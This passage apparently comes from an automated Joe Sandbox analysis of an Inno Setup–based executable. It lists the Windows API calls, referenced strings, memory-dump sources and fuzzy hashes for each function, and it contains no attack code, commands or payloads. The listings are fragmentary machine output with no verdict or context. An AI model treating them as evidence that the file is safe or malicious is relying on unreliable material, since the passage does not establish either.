                                                                                                      • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                                                      • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                      • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                                                      APIs
                                                                                                        • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                                                        • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                        • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                      • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                      • API String ID: 2906209438-2320870614
                                                                                                      • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                                      • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                                                                      • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                                      • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                        • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2492108670-2683653824
                                                                                                      • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                                      • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                                                                      • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                                      • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                                                                      APIs
                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2574300362-0
                                                                                                      • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                                      • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                                                                      • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                                      • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 1489644407-0
                                                                                                      • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                                      • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                                                                      • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                                      • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                                                                      APIs
                                                                                                      • 74D31520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                                                                      • 74D31500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                                                                      • 74D31540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: D31500D31520D31540
                                                                                                      • String ID:
                                                                                                      • API String ID: 1003763464-0
                                                                                                      • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                                      • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                                                                      • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                                      • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                                                                      APIs
                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                                      • TranslateMessage.USER32(?), ref: 0042449F
                                                                                                      • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4217535847-0
                                                                                                      • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                      • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                                      • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                      • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                                      APIs
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Prop$Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 3363284559-0
                                                                                                      • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                                      • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                                                                      • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                                      • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                                      • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableEnabledVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3234591441-0
                                                                                                      • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                                      • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                                                                      • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                                      • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 0046A378
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: PrepareToInstall
                                                                                                      • API String ID: 2558294473-1101760603
                                                                                                      • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                                      • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                                                                      • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                                      • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /:*?"<>|
                                                                                                      • API String ID: 0-4078764451
                                                                                                      • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                                      • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                                                                      • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                                      • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 004820FE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: InitializeWizard
                                                                                                      • API String ID: 2558294473-2356795471
                                                                                                      • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                                      • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                                                                      • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                                      • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                      • API String ID: 47109696-1019749484
                                                                                                      • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                                      • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                                                                      • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                                      • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
                                                                                                      APIs
                                                                                                      • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                                      Strings
                                                                                                      • Inno Setup: Setup Version, xrefs: 0046F10D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID: Inno Setup: Setup Version
                                                                                                      • API String ID: 3702945584-4166306022
                                                                                                      • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                                      • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                                                                      • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                                      • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                                                                      APIs
                                                                                                      • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID: NoModify
                                                                                                      • API String ID: 3702945584-1699962838
                                                                                                      • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                                      • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                                                                      • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                                      • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                                                        • Part of subcall function 0042E32C: 73A0A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                                                        • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                                                        • Part of subcall function 0042E32C: 73A0A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                                                                      • SendNotifyMessageA.USER32(00020420,00000496,00002711,-00000001), ref: 0047E1C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A480A570EnumFontsMessageNotifySend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2685184028-0
                                                                                                      • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                                      • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                                                                      • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                                      • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3660427363-0
                                                                                                      • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                                      • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                                                                      • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                                      • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9
                                                                                                      APIs
